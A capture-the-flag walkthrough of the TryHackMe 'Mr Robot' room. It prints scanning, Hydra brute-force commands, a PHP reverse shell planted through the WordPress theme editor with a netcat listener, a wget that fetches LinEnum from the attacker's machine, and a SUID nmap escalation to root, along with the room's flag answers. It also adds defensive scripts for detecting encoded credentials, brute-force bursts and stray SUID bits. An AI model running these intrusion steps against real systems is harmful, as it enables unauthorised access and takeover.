Hi! It is time to look at the Mr Robot CTF room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/mrrobot
Task 1 (Connect to our network)
Simply start up the machine on THM, and connect to it through OpenVPN or start up an AttackBox.
Let’s move on!
Task 2 (Hack the machine)
Alright. Let’s get this party started!
This is an open-ended challenge, meaning there are no instructions. Let’s start exploring the box to see if we can find some hints.
We can start like we are used to. Let’s run some basic nmap scans:
nmap -sV -sC -v <target ip>
The -sV argument does version detection, -sC runs the default set of scripts, and -v adds more verbose output. This should be enough to get started.
This shows two open ports: port 80 for HTTP and port 443 for HTTPS. So there is a website running on the address.
Visit the ip address in a browser. You should see some animations running and after the page is loaded you will get to the following screen:
We can run six different commands; each of them plays a different clip.
Let’s have a look at the source code:
Nothing here but some “YOU ARE NOT ALONE” message.
Besides looking at the source code we can also have a look at the robots.txt file, which tells search engine crawlers which paths they are asked not to crawl.
This file is accessible by adding /robots.txt to the root url. We can read the following:
This is interesting. The contents point to a dictionary file with words, which can be found at the root.
But more interesting for now is the text file named “key-1-of-3.txt”. It contains the key!
What is key 1?
Answer: 073403c8a58a1f80d943455fb30724b9
Let’s continue hacking. We have this dictionary with a bunch of words in it, but we are unsure for now where to use it.
At this point I recommend running gobuster, which can find directories and files on websites.
Let’s run the tool by entering:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
This finds a variety of pages.
For example sitemap:
Intro:
Readme:
License:
I nearly went past this, but remember to scroll down!
This gives us a password (?):
ZWxsaW90OkVSMjgtMDY1Mgo=
The first thing I thought was that this was a key, but it does not work on THM. Then I figured out it was a base64 string that needs to be decoded.
Enter the following command in the terminal:
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode
This returns: elliot:ER28-0652
This looks like a username and password. But to what?
Let’s move on.
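Credentials leak this way more often than one would expect: someone base64-encodes a user:password pair and drops it into a page or a license file, thinking it is hidden. The following script is an added example (it is not part of the original walkthrough) that a site owner could run over their own published content to catch exactly that before a visitor does. The regular expressions, the function names and the sample page text are my own constructions; the sample contains the same blob as the license page above, plus two harmless decoys.

```python
import base64
import binascii
import re

# Constructed sample page text: the same base64 blob as on the license page,
# plus two decoys (one valid base64 that is not a credential, one too short).
SAMPLE_PAGE = """\
GNU General Public License text ...
ZWxsaW90OkVSMjgtMDY1Mgo=
aGVsbG8gd29ybGQ=
cGxhaW4=
"""

# A standalone base64 token: groups of four alphabet chars, optional padding,
# not glued to other base64 characters on either side.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/=])"
    r"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
    r"(?![A-Za-z0-9+/=])"
)

# Decoded text shaped like "username:password" (hypothetical heuristic).
CRED_SHAPE = re.compile(r"^[A-Za-z0-9_.-]{1,64}:\S{4,}$")


def decode_token(token):
    """Return the decoded text if token is strict base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii").rstrip("\r\n")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch.isprintable() for ch in text):
        return None
    return text


def find_encoded_credentials(page_text, min_len=16):
    """Scan page_text for base64 tokens and report the ones that decode to text.

    Each finding records the token, the decoded text and whether it looks
    like a user:password pair. Tokens shorter than min_len are ignored so
    that ordinary words are not treated as base64.
    """
    findings = []
    for match in B64_TOKEN.finditer(page_text):
        token = match.group(0)
        if len(token) < min_len:
            continue
        decoded = decode_token(token)
        if decoded is None:
            continue
        findings.append({
            "token": token,
            "decoded": decoded,
            "looks_like_credential": CRED_SHAPE.match(decoded) is not None,
        })
    return findings


if __name__ == "__main__":
    for finding in find_encoded_credentials(SAMPLE_PAGE):
        flag = "CREDENTIAL?" if finding["looks_like_credential"] else "text"
        print(f"{flag:12} {finding['token']} -> {finding['decoded']!r}")
```

Run it against the exported HTML or markdown of a site; the min_len filter and the printable-ASCII check keep the noise from long English words down, and anything flagged as a credential should simply be removed from the published content.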
While I figured this out gobuster found a WordPress login page:
Maybe we can use this username and password here? It actually works, and we can log in!
But there is another way of figuring out the username and password if you missed the base64 string on the license page.
Try a random username and password and notice the error message! The login page tells you that the username is wrong. This is a major vulnerability (username enumeration), since it lets us try many different usernames and see which one is right.
Maybe the dictionary file can help us, as it might contain possible usernames that can be combined with the previously found password. We need Hydra to crack the password and to exploit the weakness just mentioned.
For this, let’s use Burp Suite! We can use it to see what the POST request looks like when trying to log in. Afterwards we can use this POST request with Hydra.
Make sure the FoxyProxy Firefox plugin has the Burp proxy turned on:
Open Burp Suite and go to the Proxy → Intercept tab. Make sure intercept is on, like below:
Keep pressing Forward on each intercepted request until you see the login POST request:
The important part is this:
log=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.63.219%2Fwp-admin%2F&testcookie=1
This shows which parameters the web application expects in the POST request.
Remember to turn off the intercept now. Now it’s time for Hydra!
Enter the following command:
hydra -L fsocity.dic -p "test" <target ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -v
Let’s walk through this together.
- The -L flag loads a list of usernames to try from a text file. (Lowercase -l would mean a single static username.)
- The -p flag gives it a single static password. (Uppercase -P would mean a list of passwords.)
- http-post-form is the type of service (Hydra module) to use.
- "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" looks trickier than it is: the three colon-separated parts are the login path, the POST body with ^USER^ and ^PWD^ as placeholders that Hydra fills in, and the string in the response that marks a failed attempt.
- -v gives the program more verbosity.
Start it up and let it run. At some point you should find the username: Elliot
If you enter this username on the login screen you get the following message:
This confirms that the username is correct, but the password is wrong.
Now that we know the username we can do the opposite procedure in Hydra to crack the password:
hydra -l Elliot -P ~/Downloads/fsocity.dic <target ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:incorrect"
We will find the password:
ER28-0652
Now it is time to log in. It works! But we already knew that after we decoded the base64 string found on the license page.
Let’s have a look around in WordPress. Nothing seems out of the ordinary. There are a couple of things we can do. Let’s look at the installed version of WordPress to see if it has any known vulnerabilities.
We could create a reverse shell by inserting some PHP code through the theme editor (Appearance -> Editor).
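From the defender’s side, the two Hydra runs above show up as a burst of POST requests to /wp-login.php from a single address in the web server’s access log. The script below is an added example and not part of the original article: it parses Apache combined-format log lines and flags any client that sends more POSTs to the login page than a threshold within a sliding time window. The log lines, IP addresses and timestamps are constructed for the example, and the threshold of 20 requests per 60 seconds is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log format. Only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/wp-login.php"

# Constructed sample: a real user viewing and submitting the login form once,
# followed by a 40-request burst from one address, as a password-guessing
# tool produces.
LEGIT_LINES = [
    '10.0.0.7 - - [20/Jan/2024:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2134 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [20/Jan/2024:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example/wp-login.php" "Mozilla/5.0"',
    '10.0.0.7 - - [20/Jan/2024:10:00:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 31876 "http://blog.example/wp-login.php" "Mozilla/5.0"',
]
BURST_LINES = [
    f'10.0.0.99 - - [20/Jan/2024:10:05:{sec:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 2561 "-" "Mozilla/5.0"'
    for sec in range(40)
]
SAMPLE_LOG_LINES = LEGIT_LINES + BURST_LINES


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(lines, threshold=20, window_seconds=60):
    """Flag clients that POST to the login page >= threshold times in a sliding window.

    Returns one alert per offending IP with the peak count seen in any window
    and the timestamps of the first and last request that contributed.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        window = recent[ev["ip"]]
        window.append(ev["ts"])
        cutoff = ev["ts"] - timedelta(seconds=window_seconds)
        while window and window[0] < cutoff:
            window.popleft()
        if len(window) < threshold:
            continue
        alert = alerts.setdefault(
            ev["ip"], {"ip": ev["ip"], "count": 0, "first": window[0], "last": ev["ts"]}
        )
        alert["count"] = max(alert["count"], len(window))
        alert["last"] = ev["ts"]
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_login_bruteforce(SAMPLE_LOG_LINES):
        print(f"{alert['ip']}: {alert['count']} login POSTs between "
              f"{alert['first']} and {alert['last']}")
```

The access log cannot show which usernames were tried, because they travel in the POST body, so the count-based rule is the practical signal. The enumeration weakness itself is closed on the WordPress side by returning the same error for a wrong username and a wrong password (the login_errors filter can replace the message) and by rate-limiting login attempts.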
Get a reverse shell script here:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Copy the whole thing into the theme editor for page.php. You can paste it at the top, after the <?php opening tag. Before you save, edit the IP address and port number to fit your setup.
If you are in doubt about your IP, run the ifconfig command in your terminal and look at the tun0 adapter. Use the IP written after inet.
Save the file, and start up a netcat listener (keeping in mind the port you chose!):
nc -lvnp 12345
Now all that is needed is to request the PHP file. It is located at the following address:
https://10.10.248.80/wp-content/themes/twentyfifteen/404.php
Open this and you should get a reverse shell. Before you celebrate though, we need to upgrade the shell so we can use it properly; it is a ‘dumb’ shell right now. We can do this by entering:
python -c 'import pty; pty.spawn("/bin/bash")'
Voila, we got a more interactive shell:
Let’s see what we can find. There are some interesting files in the home directory of the robot user. Unfortunately we can’t read the key-2-of-3.txt file. But there is a hashed password for the robot user in the password.raw-md5 file.
The hash is c3fcd3d76192e4007dfb496cca67e13b and I decided to crack it on CrackStation. This results in the following password: abcdefghijklmnopqrstuvwxyz
Now all that remains is to change user with the su command:
su robot
Enter the password and read the key:
We got it... phew!
What is key 2?
Answer: 822c73956184f694993bede3eb39f959
Now we need to look for further vulnerabilities. For this we can use a tool such as LinEnum. But we need to get this script onto the target machine, which we can do by starting a Python web server on our attacker machine and then fetching the script with wget or curl.
python -m http.server
Now move to the /tmp directory, otherwise you won’t have permission to write the file. Then fetch the file from our machine:
wget <ip>:8000/LinEnum.sh
There it is:
Now we have the LinEnum.sh script on the target machine. Let’s run it:
sh LinEnum.sh
There is a lot of output, but the following stands out:
This is interesting: if the SUID bit is set on a file, non-root users may be able to use that file to escalate their privileges to root.
Now that we know this is the case for the nmap binary, we can read more about our options on GTFOBins:
https://gtfobins.github.io/gtfobins/nmap/
Since the system is running nmap 3.x, we can read that we can do the following:
What are you waiting for? Let’s give it a try:
nmap --interactive
Followed by:
!sh
If you run whoami now you can see we got root:
HURRAH! Go to the home directory of the root user (/root) and list the files and directories. There is the flag!
Read it and we win! 🙂
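The root cause of the last step is a single binary carrying a setuid bit it should never have had. A regular audit catches that class of problem before anyone else does. The script below is an added example, not from the article and not from LinEnum: it walks a directory tree, lists every regular file with the setuid bit, and reports those that are not on an expected baseline. The baseline contents and the throw-away demo tree with a setuid nmap are constructed for the example; on a real host you would run find_suid_files against / and build the baseline from a freshly installed system of the same distribution.

```python
import os
import shutil
import stat
import tempfile

# Assumed baseline of setuid binaries that are expected on the host, as paths
# relative to the audited root. Build it from a clean install of the same
# distribution and keep it under version control.
EXPECTED_SUID = {"usr/bin/passwd", "usr/bin/sudo"}


def find_suid_files(root):
    """Walk root and return every regular file that has the setuid bit set."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append({
                    "path": os.path.relpath(path, root),
                    "owner_uid": st.st_uid,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                })
    return found


def unexpected_suid(root, expected=EXPECTED_SUID):
    """Return the sorted relative paths of setuid files that are not on the baseline."""
    return sorted(f["path"] for f in find_suid_files(root) if f["path"] not in expected)


def build_demo_tree():
    """Constructed sample: a throw-away tree mimicking the finding on the box.

    passwd is setuid and expected, nmap is setuid and not expected, ls is a
    normal binary. Returns the temporary root; the caller removes it.
    """
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = [
        ("usr/bin/passwd", 0o4755),
        ("usr/local/bin/nmap", 0o4755),
        ("usr/bin/ls", 0o755),
    ]
    for rel, mode in layout:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
        os.chmod(full, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    try:
        for entry in find_suid_files(demo_root):
            print(f"setuid {entry['mode']} uid={entry['owner_uid']} {entry['path']}")
        print("not on baseline:", unexpected_suid(demo_root))
    finally:
        shutil.rmtree(demo_root)
```

Anything reported as not on the baseline gets the bit removed with chmod u-s (or the package gets removed), and the audit is worth running from a cron job or a configuration-management check so that a bit re-introduced by an install or a manual change is noticed quickly.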
What is key 3?
Answer: 04787ddef27c3dee1ee161b21670b4e4
Another room done, great job! Be sure to leave a clap or two if you liked this article 🙂
If you want, you can even leave 50 claps by holding the clap button 😉
Happy Hacking!
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: